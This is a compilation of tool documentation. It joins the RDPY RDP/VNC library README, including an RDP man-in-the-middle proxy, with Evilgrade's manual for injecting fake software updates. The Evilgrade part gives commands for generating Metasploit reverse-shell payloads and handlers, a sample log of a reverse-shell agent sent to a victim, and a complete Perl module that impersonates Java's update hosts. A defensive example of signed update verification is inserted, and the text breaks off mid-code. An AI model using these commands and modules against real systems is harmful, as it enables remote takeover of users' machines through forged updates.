    RDPY is fully implemented in python, except the bitmap decompression algorithm which is implemented in C for performance purposes.

    Dependencies
    Dependencies are only needed for the pyqt4 binaries:
    • rdpy-rdpclient
    • rdpy-rdpscreenshot
    • rdpy-vncclient
    • rdpy-vncscreenshot
    • rdpy-rssplayer

    Linux
    Example for Debian based systems :
    sudo apt-get install python-qt4

    OS X
    Example for OS X to install PyQt with homebrew
    $ brew install qt sip pyqt

    Windows
    x86       x86_64
    PyQt4     PyQt4
    PyWin32   PyWin32

    Build
    $ git clone https://github.com/citronneur/rdpy.git rdpy
    $ pip install twisted pyopenssl qt4reactor service_identity rsa pyasn1
    $ python rdpy/setup.py install
    Or use PIP:
    $ pip install rdpy
    For virtualenv, you will need to link the qt4 library to it:
    $ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
    $ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/

    RDPY Binaries
    RDPY comes with some very useful binaries. These binaries are linux and windows compatible.

    rdpy-rdpclient
    rdpy-rdpclient is a simple RDP Qt4 client.
    $ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_output_file] [...] XXX.XXX.XXX.XXX[:3389]
    You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot.

    rdpy-vncclient
    rdpy-vncclient is a simple VNC Qt4 client.
    $ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]

    rdpy-rdpscreenshot
    rdpy-rdpscreenshot saves login screen in file.
    $ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]

    rdpy-vncscreenshot
    rdpy-vncscreenshot saves the first screen update in file.
    $ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]

    rdpy-rdpmitm
    rdpy-rdpmitm is an RDP proxy that allows you to perform a Man In The Middle attack on the RDP protocol. It records a Session Scenario into an rss file which can be replayed by rdpy-rssplayer.
    $ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]
    The output directory is used to save the rss file with the following name format (YYYYMMDDHHMMSS_ip_index.rss). The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer: if either parameter is omitted, the server uses standard RDP as the security layer.

    rdpy-rdphoneypot
    rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol.
    $ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N
    The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer: if either parameter is omitted, the server uses standard RDP as the security layer. You can specify more than one file to match more common screen sizes.

    rdpy-rssplayer
    rdpy-rssplayer is used to replay Record Session Scenario (rss) files generated by either the rdpy-rdpmitm or rdpy-rdpclient binaries.
    $ rdpy-rssplayer.py rss_file_path

    RDPY Qt Widget
    RDPY can also be used as Qt widget through rdpy.ui.qt4.QRemoteDesktop class. It can be embedded in your own Qt application. qt4reactor must be used in your app for Twisted and Qt to work together. For more details, see sources of rdpy-rdpclient.

    RDPY library
    In a nutshell RDPY can be used as a protocol library with a twisted engine.

    Simple RDP Client
    from rdpy.protocol.rdp import rdp
    from twisted.internet import reactor


    class MyRDPFactory(rdp.ClientFactory):

        def clientConnectionLost(self, connector, reason):
            reactor.stop()

        def clientConnectionFailed(self, connector, reason):
            reactor.stop()

        def buildObserver(self, controller, addr):

            class MyObserver(rdp.RDPClientObserver):

                def onReady(self):
                    """
                    @summary: Call when stack is ready
                    """
                    # send 'r' key: sendKeyEventUnicode takes the code point of the
                    # character (the original called a non-existent str.toUtf8())
                    self._controller.sendKeyEventUnicode(ord(u"r"), True)
                    # mouse move and click at pixel 200x200 (Python's boolean is True, not true)
                    self._controller.sendPointerEvent(200, 200, 1, True)

                def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
                    """
                    @summary: Notify bitmap update
                    @param destLeft: xmin position
                    @param destTop: ymin position
                    @param destRight: xmax position because RDP can send bitmap with padding
                    @param destBottom: ymax position because RDP can send bitmap with padding
                    @param width: width of bitmap
                    @param height: height of bitmap
                    @param bitsPerPixel: number of bit per pixel
                    @param isCompress: use RLE compression
                    @param data: bitmap data
                    """

                def onSessionReady(self):
                    """
                    @summary: Windows session is ready
                    """

                def onClose(self):
                    """
                    @summary: Call when stack is close
                    """

            return MyObserver(controller)


    reactor.connectTCP("XXX.XXX.XXX.XXX", 3389, MyRDPFactory())
    reactor.run()

    Simple RDP Server
    from rdpy.protocol.rdp import rdp
    from twisted.internet import reactor


    class MyRDPFactory(rdp.ServerFactory):

        def buildObserver(self, controller, addr):

            class MyObserver(rdp.RDPServerObserver):

                def onReady(self):
                    """
                    @summary: Call when server is ready
                    to send and receive messages
                    """

                def onKeyEventScancode(self, code, isPressed):
                    """
                    @summary: Event call when a keyboard event is catch in scan code format
                    @param code: scan code of key
                    @param isPressed: True if key is down
                    @see: rdp.RDPServerObserver.onKeyEventScancode
                    """

                def onKeyEventUnicode(self, code, isPressed):
                    """
                    @summary: Event call when a keyboard event is catch in unicode format
                    @param code: unicode of key
                    @param isPressed: True if key is down
                    @see: rdp.RDPServerObserver.onKeyEventUnicode
                    """

                def onPointerEvent(self, x, y, button, isPressed):
                    """
                    @summary: Event call on mouse event
                    @param x: x position
                    @param y: y position
                    @param button: 1, 2 or 3 button
                    @param isPressed: True if mouse button is pressed
                    @see: rdp.RDPServerObserver.onPointerEvent
                    """

                def onClose(self):
                    """
                    @summary: Call when human client close connection
                    @see: rdp.RDPServerObserver.onClose
                    """

            return MyObserver(controller)


    reactor.listenTCP(3389, MyRDPFactory())
    reactor.run()

    Simple VNC Client
    from rdpy.protocol.rfb import rfb
    from twisted.internet import reactor


    class MyRFBFactory(rfb.ClientFactory):

        def clientConnectionLost(self, connector, reason):
            reactor.stop()

        def clientConnectionFailed(self, connector, reason):
            reactor.stop()

        def buildObserver(self, controller, addr):

            class MyObserver(rfb.RFBClientObserver):

                def onReady(self):
                    """
                    @summary: Event when network stack is ready to receive or send event
                    """

                def onUpdate(self, width, height, x, y, pixelFormat, encoding, data):
                    """
                    @summary: Implement RFBClientObserver interface
                    @param width: width of new image
                    @param height: height of new image
                    @param x: x position of new image
                    @param y: y position of new image
                    @param pixelFormat: pixefFormat structure in rfb.message.PixelFormat
                    @param encoding: encoding type rfb.message.Encoding
                    @param data: image data in accordance with pixel format and encoding
                    """

                def onCutText(self, text):
                    """
                    @summary: event when server send cut text event
                    @param text: text received
                    """

                def onBell(self):
                    """
                    @summary: event when server send biiip
                    """

                def onClose(self):
                    """
                    @summary: Call when stack is close
                    """

            return MyObserver(controller)


    # VNC listens on 5900 by default (as in the rdpy-vncclient usage above);
    # the original example connected to 3389, which is the RDP port
    reactor.connectTCP("XXX.XXX.XXX.XXX", 5900, MyRFBFactory())
    reactor.run()


    Evilgrade - Modular Framework To Take Advantage Of Poor Upgrade Implementations By Injecting Fake Updates


    Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has its own WebServer and DNSServer modules. It is easy to set up new settings, and it autoconfigures itself when new binary agents are set.


    * When should I use evilgrade?
    This framework comes into play when the attacker is able to make hostname redirections (manipulation of the victim's DNS traffic), which can be done in two scenarios:

    Internal scenery:
    • Internal DNS access
    • ARP spoofing
    • DNS Cache Poisoning
    • DHCP spoofing
    • TCP hijacking
    • Wi-Fi Access Point impersonation

    External scenery:
    • Internal DNS access
    • DNS Cache Poisoning

* How does it work?
Evilgrade works with modules; each module implements the structure needed to emulate a fake update for a specific application or system: the VirtualHosts the updater contacts, the HTTP requests it makes, and the responses (configuration files and binaries) to serve back.

* What OS are supported?
ISR-Evilgrade is cross-platform; it only depends on having an appropriate payload for the target platform being exploited.
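The client-side weakness every module above relies on, and the checks that close it, as an added example (Python, written for this page; it is not part of Evilgrade or of any listed product). update_insecure() trusts whatever the host it resolved serves, which is exactly what a spoofed DNS answer plus a fake web server exploits. update_verified() pins the publisher's key, refuses non-https download URLs and checks the payload digest against the signed manifest before anything runs. The RSA here is a 256-bit toy with unpadded textbook signatures so that signing and verification run on the standard library alone; a real updater would use Ed25519 or RSA-2048+ from a vetted library. The manifest format, URLs and payload bytes are constructed for the example.

```python
import hashlib
import secrets
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# --- Toy RSA (assumption of this example, NOT secure): 256-bit modulus, unpadded
# signatures, standard library only. Production code uses a vetted library.
def _probable_prime(bits, rounds=20):
    while True:
        n = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        d, r = n - 1, 0
        while d % 2 == 0:
            d, r = d // 2, r + 1
        for _ in range(rounds):                      # Miller-Rabin
            x = pow(secrets.randbelow(n - 3) + 2, d, n)
            if x in (1, n - 1):
                continue
            for _ in range(r - 1):
                x = pow(x, 2, n)
                if x == n - 1:
                    break
            else:
                break                                # composite: draw a new candidate
        else:
            return n

def toy_keypair(bits=256):
    e = 65537
    while True:
        p, q = _probable_prime(bits // 2), _probable_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:                       # e must be invertible modulo phi
            return (p * q, e), (p * q, pow(e, -1, phi))

def sign(priv, data):
    n, d = priv
    return pow(int.from_bytes(hashlib.sha256(data).digest(), "big"), d, n)

def verify(pub, data, sig):
    n, e = pub
    return pow(sig, e, n) == int.from_bytes(hashlib.sha256(data).digest(), "big") % n

# --- The update client, in the shape Evilgrade exploits and in a hardened shape.
class UpdateRejected(Exception):
    pass

def parse_manifest(xml_bytes):
    root = ET.fromstring(xml_bytes)                  # untrusted input: prefer defusedxml in production
    return {k: root.findtext(k) for k in ("version", "url", "sha256")}

def update_insecure(manifest_xml, fetch):
    """Trusts whatever the resolved host serves; with DNS under the attacker's control
    this fetches the fake server's agent. Returns the bytes the client would execute."""
    return fetch(parse_manifest(manifest_xml)["url"])

def update_verified(manifest_xml, signature, fetch, publisher_pub):
    """Three checks that hold even when DNS and the transport are hostile:
    1. the manifest is signed by the publisher key pinned in the client,
    2. the download URL is https (a fake server cannot present a certificate the
       client trusts for the spoofed vhost),
    3. the payload digest matches the signed manifest before anything runs."""
    if not verify(publisher_pub, manifest_xml, signature):
        raise UpdateRejected("manifest signature invalid")
    manifest = parse_manifest(manifest_xml)
    if urlparse(manifest["url"]).scheme != "https":
        raise UpdateRejected("refusing non-https download: " + manifest["url"])
    payload = fetch(manifest["url"])
    if hashlib.sha256(payload).hexdigest() != manifest["sha256"]:
        raise UpdateRejected("payload digest mismatch")
    return payload

def try_update(manifest_xml, signature, fetch, publisher_pub):
    """update_verified, returning the rejection reason instead of raising."""
    try:
        return update_verified(manifest_xml, signature, fetch, publisher_pub)
    except UpdateRejected as exc:
        return str(exc)

# --- Constructed scenario: genuine publisher vs. an Evilgrade-style impostor.
def make_manifest(url, payload, version="1.6.0_23"):
    return (f"<update><version>{version}</version><url>{url}</url>"
            f"<sha256>{hashlib.sha256(payload).hexdigest()}</sha256></update>").encode()

PUB, PRIV = toy_keypair()                            # publisher key; PUB is pinned in the client
GENUINE = b"MZ genuine-update-bits"                 # constructed stand-in for the real installer
EVIL = b"MZ reverseshell"                           # constructed stand-in for a fake-update agent
URL = "https://javadl-esd.sun.com/update/jre.exe"
GENUINE_MANIFEST = make_manifest(URL, GENUINE)
GENUINE_SIG = sign(PRIV, GENUINE_MANIFEST)
EVIL_MANIFEST = make_manifest(URL.replace("https", "http"), EVIL)
# What each URL returns once the vhost resolves to the fake server (fetch stands in for HTTP).
NETWORK = {URL: GENUINE, URL.replace("https", "http"): EVIL}
fetch = NETWORK.__getitem__

if __name__ == "__main__":
    print("insecure client ran:", update_insecure(EVIL_MANIFEST, fetch))
    print("verified client, fake manifest:", try_update(EVIL_MANIFEST, GENUINE_SIG, fetch, PUB))
    print("verified client, genuine update:", try_update(GENUINE_MANIFEST, GENUINE_SIG, fetch, PUB))
```

The impostor cannot produce a valid signature over its own manifest, so replaying the publisher's signature fails the first check; serving the genuine signed manifest but a swapped binary fails the digest check; and a manifest that points at plain http is refused even when legitimately signed, which is the check that keeps a DNS spoof from ever reaching the fake web server.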

    Implemented modules:
    • Freerip 3.30
    • Jet photo 4.7.2
    • Teamviewer 5.1.9385
    • ISOpen 4.5.0
    • Istat.
    • Gom 2.1.25.5015
    • Atube catcher 1.0.300
    • Vidbox 7.5
    • Ccleaner 2.30.1130
    • Fcleaner 1.2.9.409
    • Allmynotes 1.26
    • Notepad++ 5.8.2
    • Java 1.6.0_22 winxp/win7
    • aMSN 0.98.3
    • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
    • Mirc 7.14
    • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
    • Dap 9.5.0.3
    • Winscp 4.2.9
    • AutoIt Script 3.3.6.1
    • Clamwin 0.96.0.1
    • AppTapp Installer 3.11 (Iphone/Itunes)
    • getjar (facebook.com)
    • Google Analytics Javascript injection
    • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
    • Winamp 5.581
    • TechTracker (cnet) 1.3.1 (Build 55)
    • Nokiasoftware firmware update 2.4.8es - (Windows software)
    • Nokia firmware v20.2.011
    • BSplayer 2.53.1034
    • Apt ( < Ubuntu 10.04 LTS)
    • Ubertwitter 4.6 (0.971)
    • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
    • Cpan 1.9402
    • VirtualBox (3.2.8 )
    • Express talk
    • Filezilla
    • Flashget
    • Miranda
    • Orbit
    • Photoscape.
    • Panda Antirootkit
    • Skype
    • Sunbelt
    • Superantispyware
    • Trillian <= 5.0.0.26
    • Adium 1.3.10 (Sparkle Framework)
    • VMware
• more... (see /docs/CHANGES for the full list)

    MAIN USAGE
It works like a Cisco IOS-style console:
    evilgrade>help
    Type 'help command' for more detailed help on a command.
    Commands:
    configure - Configure <module-name> - no help available
    exit - exits the program
    help - prints this screen, or help on 'command'
    reload - Reload to update all the modules - no help available
    restart - Restart webserver - no help available
    set - Configure variables - no help available
    show - Display information of <object>.
    start - Start webserver - no help available
    status - Get webserver status - no help available
    stop - Stop webserver - no help available
    version - Display framework version. - no help available

    Object:
    options - Show options of current module.
    vhosts - Show VirtualHosts of current module.
    modules - List all modules available for use.
    active - Show active modules.

    List implemented modules
    evilgrade>show modules

    List of modules:
    ===============

    ...
    ...
    ...

    - 63 modules available.

    Configure a specified module
    evilgrade>conf sunjava
    evilgrade(sunjava)>

    Show all VirtualHosts.

    VirtualHost field contains the domains that our webserver is going to emulate for us.
    evilgrade>show vhosts

    Virtual hosts:
    =============

    [
    "java.sun.com",
    "javadl-esd.sun.com",
    ...
    ...
    ...
    ]

    Show options of current module.

agent: This is our fake update binary; set the path to where it is located, or implement dynamic fake update binary generation (see ADVANCED).
    evilgrade(sunjava)>show options

    Display options:
    ===============

    Name = Sun Microsystems Java
    Version = 2.0
    Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
    Description = ""
    VirtualHost = "java.sun.com|javadl-esd.sun.com"

    .-------------------------------------------------------------------------------------------------------------------------.
    | Name | Default | Description |
    +--------------+-------------------------------------------------+--------------------------------------------------------+
    | website | http://java.com/moreinfolink | Website displayed in the update |
    | enable | 1 | Status |
    | atitle | Critical vulnerability | Title name to be displayed in the systray item popup |
    | arg | | Arg passed to Agent |
    | adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup |
    | description | This critical update fix internal vulnerability | Description to be displayed during the update |
    | agent | ./agent/reverseshellsign.exe | Agent to inject |
    | title | Critical update | Title name displayed in the update |
    '--------------+-------------------------------------------------+--------------------------------------------------------'

    Start services (DNS Server and WebServer)
    evilgrade>start
    evilgrade>
    [28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
    evilgrade>
    [28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

    #### Waiting for victims

    evilgrade>
    [25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
    evilgrade>
    [25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
    evilgrade>
    [25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
    evilgrade>
    [25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

    Show status and victims logs
    evilgrade>show status
    Webserver (pid 4134) already running

    Users status:
    ============

    .---------------------------------------------------------------------------------------------------------------.
    | Client | Module | Status | Md5,Cmd,File |
    +----------------+------------------+--------+------------------------------------------------------------------+
    | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" |
    '----------------+------------------+--------+------------------------------------------------------------------'

    DEEP USAGE

    Commands

    configure / conf - Configure

    Example:
    evilgrade>configure sunjava
    evilgrade(sunjava)>

    evilgrade>conf sunjava
    evilgrade(sunjava)>

    ## 'conf' takes us back to the global configuration
    evilgrade(sunjava)>conf
    evilgrade>


    ##
reload - Reload all modules (refreshes loaded modules; useful during development)
start - Start services (WebServer and DNS Server)
stop - Stop services (the fake update server)

    Example:
    evilgrade>start
    evilgrade>
    [28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
    evilgrade>
    [28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...


    #######################################



    Example:
    -------
    evilgrade>stop
    Stopping WEBSERVER [OK]
    Stopping DNSSERVER [OK]

    #######################################

    restart - Restart services (WebServer and DNS Server)
    stops and starts again

    #######################################

    status - Get webserver and victims status

    Example:
    -------
    evilgrade>show status
    Webserver (pid 4134) already running

    Users status:
    ============

    .---------------------------------------------------------------------------------------------------------------.
    | Client | Module | Status | Md5,Cmd,File |
    +----------------+------------------+--------+------------------------------------------------------------------+
    | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" |
    '----------------+------------------+--------+------------------------------------------------------------------'

    #######################################

    show - Display information of <object>.

    #######################################

    show active - Display active modules in the webserver

    #######################################

    show modules - Display implemented modules

    #########################################

    show options - Display modules/global options

    Example:
    -------

    evilgrade>show options

    Display options:
    ===============

    .-----------------------------------------------------------------------------------.
    | Name | Default | Description |
    +-------------+-----------+---------------------------------------------------------+
    | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip |
    | DNSPort | 53 | Listen Name Server port |
    | debug | 1 | Debug mode |
    | port | 80 | Webserver listening port |
    | sslport | 443 | Webserver SSL listening port |
    '-------------+-----------+---------------------------------------------------------'

    evilgrade>
    evilgrade(notepadplus)>conf vmware
    evilgrade(vmware)>show options (without started services)

    Display options:
    ===============

    Name = VMware Server
    Version = 1.0
    Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
    Description = ""
    VirtualHost = "www.vmware.com"

    .----------------------------------------------.
    | Name | Default | Description |
    +--------+-------------------+-----------------+
    | enable | 1 | Status |
    | agent | ./agent/agent.exe | Agent to inject |
    '--------+-------------------+-----------------'

    evilgrade(vmware)>show options (with started services after setting agent)

    Display options:
    ===============

    Name = VMware Server
    Version = 1.0
    Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
    Description = ""
    VirtualHost = "www.vmware.com"

    .--------------------------------------------------------------------------------------------------.
    | Name | Default | Description |
    +-------------+------------------------------------------------------------------+-----------------+
    | enable | 1 | Status |
    | agentmd5 | f80af637642170507bda998b6f2015fa | |
    | agentsize | 54576 | |
    | agent | ./agent/agent.exe | Agent to inject |
    | agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd | |
    '-------------+------------------------------------------------------------------+-----------------'


    #########################################

    set - Configure variables global or modules

    Example:
    -------

    evilgrade>show options


    Display options:
    ===============

    .-----------------------------------------------------------------------------------.
    | Name | Default | Description |
    +-------------+-----------+---------------------------------------------------------+
    | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip |
    | DNSPort | 53 | Listen Name Server port |
    | debug | 0 | Debug mode |
    | port | 80 | Webserver listening port |
    | sslport | 443 | Webserver SSL listening port |
    '-------------+-----------+---------------------------------------------------------'

### Let's enable the debug option and set DNSAnswerIp to our own interface address (192.168.1.4)

    evilgrade>set debug 1 #Enable debug
    set debug, 1

evilgrade>set DNSAnswerIp 192.168.1.4 #IP the VirtualHosts resolve to, i.e. where evilgrade's webserver is reachable
    set DNSAnswerIp, 192.168.1.4

    evilgrade>show options

    Display options:
    ===============

    .-------------------------------------------------------------------------------------.
    | Name | Default | Description |
    +-------------+-------------+---------------------------------------------------------+
    | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip |
    | DNSPort | 53 | Listen Name Server port |
    | debug | 1 | Debug mode |
    | port | 80 | Webserver listening port |
    | sslport | 443 | Webserver SSL listening port |
    '-------------+-------------+---------------------------------------------------------'


    ###############################

    exit - exits the program

    #######################################

    help - prints this screen, or help on 'command'

    #######################################

    ADVANCED
• Module options: each module has its own options, but the "agent" field is always present. The agent is our fake update binary; set the path to where it is located, or implement dynamic fake update binary generation.
[Dynamic fake update binary] allows an external command to be executed to generate the binary, for example msfpayload from the Metasploit Framework. With this feature we can generate any Metasploit payload or use an external tool to create the binary.

Example 1:
evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'
In this case, for every update binary requested we generate a fake update binary with the payload "windows/shell_reverse_tcp", a reverse shell that connects back to 192.168.233.2 on port 4141. The pair of <%OUT%> tags marks the path where the generated binary is written, so evilgrade knows which file to serve. Evilgrade detects the dynamic fake update binary feature by the value being enclosed in square brackets '[]'; the double-quoted string inside is evaluated as Perl before the command is run, so it can contain Perl expressions.
For example, if we use:
evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'
then every time a binary is requested, evilgrade evaluates the expression and executes the resulting command "./generatebin -o /tmp/update(random).exe", generating a different agent each time.
A simpler, static alternative is to generate the payload with msfpayload in a terminal and point the module's agent option at the resulting file.

Example 2:
(Outside evilgrade)
[team@infobyte]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe
(Inside evilgrade)
evilgrade(sunjava)>set agent /tmp/reverse-shell.exe
Once the payload is generated, leave a multi/handler listening on the LHOST and LPORT assigned above. The handler's PAYLOAD must match the payload the agent was built with (here windows/meterpreter/reverse_ord_tcp); a handler for a different stager will not complete the session.
(Outside evilgrade)
[team@infobyte]$ msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 E
[*] Started reverse handler on 192.168.100.2:4444
[*] Starting the payload handler...
Note that msfpayload and msfcli have since been removed from Metasploit; on current versions use msfvenom (-p <payload> LHOST=... LPORT=... -f exe -o <file>) to build the agent and msfconsole -x "use exploit/multi/handler; set PAYLOAD <payload>; set LHOST ...; set LPORT ...; run" for the listener.

    MODULE DEVELOPMENT
Module development is straightforward. Since evilgrade is built on modules, you only have to write a Perl package (.pm). Below we describe the sunjava update module (comments start with #):
package modules::sunjava;

use strict;
use Data::Dump qw(dump);

my $base =
{
    'name'        => 'Sun Microsystems Java',   # name of the module displayed in the framework
    'version'     => '2.0',                     # internal module version
    'appver'      => '<= 1.6.0_22',             # last application version tested with this evilgrade module
    'author'      => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ], # author
    'description' => qq{},                      # brief description
    'vh'          => '(java.sun.com|javadl-esd.sun.com)', # VirtualHosts the application uses to retrieve the update configuration files and update binaries

    # Then we have the collection of request objects
    'request' => [
        # Each object is a possible HTTP request inside the VirtualHosts configured for the module (java.sun.com)
        {
            'req'    => '(/update/[.\d]+/map\-[.\d]+.xml|/update/1.6.0/map\-m\-1.6.0.xml)', # the requested URL, regex friendly
            'type'   => 'file',   # the response type (file|string|agent|install)
            # we can use:
            # file:    respond with the content of the file referenced in the "file" option below (./include/sunjava_map.xml)
            # string:  respond with the string referenced in the "string" option below
            # agent:   respond with the content of the file referenced in the "agent" option (options section)
            # install: respond with the content of the file referenced in the "file" option below;
            #          used to know that the fake update was executed. Some update processes
            #          request a final page after the update is installed, so we send them to a controller page.
            'method' => '',       # not implemented yet
            'bin'    => '',       # set to 1 if we are going to send a binary file
            'string' => '',       # if 'type' is string, this variable holds the response
            'parse'  => '',       # set to 1 if the file or string needs to be parsed with the options
            'file'   => './include/sunjava/sunjava_map.xml'
        },
        {
            'req'    => '^/java_update.xml$',   # regex friendly
            'type'   => 'file',                 # file|string|agent|install
            'method' => '',                     # any
            'bin'    => '',
            'string' => '',
            'parse'  => '1',
            'file'   => './include/sunjava/sunjava_update.xml'
        },
        {
            'req'    => '/x.jnlp',              # regex friendly
            'type'   => 'file',                 # file|string|agent|install
            'method' => '',                     # any
            'bin'    => '',
            'string' => '',
            # In this case we parse the file
            'parse'  => '1',
            # To parse the file we use special tags like <%OPTIONNAME%> inside the "file" or "string" contents.
            # These tags are replaced with the values of the options; for example
            # <%TITLE%> is replaced by 'Critical update'
            'file'   => './include/sunjava/x.jnlp'
        },
        {
            'req'    => '.jar',                 # regex friendly
            'type'   => 'file',                 # file|string|agent|install
            'method' => '',                     # any
            'bin'    => 1,
            'string' => '',
            'parse'  => '',
            'file'   => './include/sunjava/JavaPayload/FunnyClass2.jar'
        },
        {
            'req'    => '.exe',                 # regex friendly
            'type'   => 'agent',                # an agent type with a binary response
            'bin'    => 1,
            'method' => '',                     # any
            'string' => '',
            'parse'  => '',
            'file'   => ''
        }
    ],

    # Options
    # These are the options displayed by "show options" inside the current module.
    # They are also used to parse the strings or files used in the responses.
    'options' => {
        'agent'  => { 'val'  => './agent/java/javaws.exe',   # the default value
                      'desc' => 'Agent to inject' },           # brief description
        'arg'    => { 'val'  => 'http://java.sun.com/x.jnlp',
                      'desc' => 'Arg passed to Agent' },
        'enable' => { 'val'  => 1,
                      'desc' => 'Status' },

        # The following is a dynamic hidden option.
        # When the files are parsed, the tag <%NAME%> is replaced by the result of evaluating
        # this Perl expression, so a fresh random value is produced on each request.
        # Any Perl can be used; for more helper functions see "isrcore/utils.pm"
        'name'   => { 'val'     => "'javaupdate'.isrcore::utils::RndAlpha(isrcore::utils::RndNum(1))",
                      'hidden'  => 1,
                      'dynamic' => 1, },

        # The remaining options depend on the update process. You have to research the variables
        # the real updater uses and implement them in your module.
        # These are the most common: update messages, web pages, descriptions, popup messages, titles, etc.
        'title'        => { 'val'  => 'Critical update',
                            'desc' => 'Title name displayed in the update' },
        'description'  => { 'val'  => 'This critical update fix internal vulnerability',
                            'desc' => 'Description to be displayed during the update' },
        'atitle'       => { 'val'  => 'Critical vulnerability',
                            'desc' => 'Title name to be displayed in the systray item popup' },
        'adescription' => { 'val'  => 'This critical update fix internal vulnerability',
                            'desc' => 'Description to be displayed in the systray item popup' },
        'website'      => { 'val'  => 'http://java.com/moreinfolink',
                            'desc' => 'Website displayed in the update' }
    }
};

.:: [TIPS] ::.
1. Run evilgrade as a user with privileges to create listening sockets (ports 53, 80 and 443 by default), otherwise you won't be able to use evilgrade's services.
2. Every time you modify a module while evilgrade is running, 'reload' the modules.
3. Set the binary 'agents' before starting the services, because evilgrade fills in some fields for you (agentmd5, agentsha256 and agentsize) that cannot be computed once the services are running.
4. If you are using a dynamic response with variables such as <%AGENTSIZE%>, <%AGENTMD5%>, <%URL_FILE%>, <%URL_FILE_EXT%>, or custom ones defined in the options section, set parse to 1.
5. Likewise, to inject an agent you must set the bin flag to 1.
6. To craft the raw HTTP response headers yourself (for example a 302 redirect), use the cheader field. Example:
    {
        'req'     => '/sitepath/download/file.zip',   # regex friendly
        'type'    => 'string',                        # file|string|agent|install
        'method'  => '',                              # any
        'bin'     => '',
        'string'  => '',
        'parse'   => '1',
        'file'    => '',
        'cheader' => "HTTP/1.1 302 Found\r\n"
                   . "Location: http://sitedomain.com/<%URL_FILE%>.exe \r\n"
                   . "Content-Length: 0 \r\n"
                   . "Connection: close \r\n\r\n",
    },
7. To filter by User-Agent, take the Sparkle2 module as an example: add 'useragent' => 'true' to the base, and in a request object add a 'useragent' field that is matched like 'req' but against the User-Agent header. Note that the "User-Agent: " prefix is already stripped from the value being matched.
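How a module's request list, options and <%TAG%> parsing fit together at request time, as an added example written for this page in Python; it is a model of the behaviour described by the sunjava module and the tips above, not Evilgrade's own (Perl) code. Assumptions of this model: the include files are replaced by an in-memory dict, a 'dynamic' option is a Python callable instead of an evaluated Perl string, the agent fields are computed from the agent bytes the way tip 3 describes, and <%URL_FILE%> / <%URL_FILE_EXT%> are read as the stem and extension of the requested file (my reading of the cheader example in tip 6). The template text and agent bytes are constructed.

```python
import hashlib
import posixpath
import random
import re
import string

# Constructed stand-ins for what evilgrade reads from disk, so the example runs offline.
AGENT_BYTES = b"MZ" + bytes(range(256))            # plays ./agent/agent.exe (258 bytes)
INCLUDE = {
    "./include/sunjava/sunjava_update.xml": (
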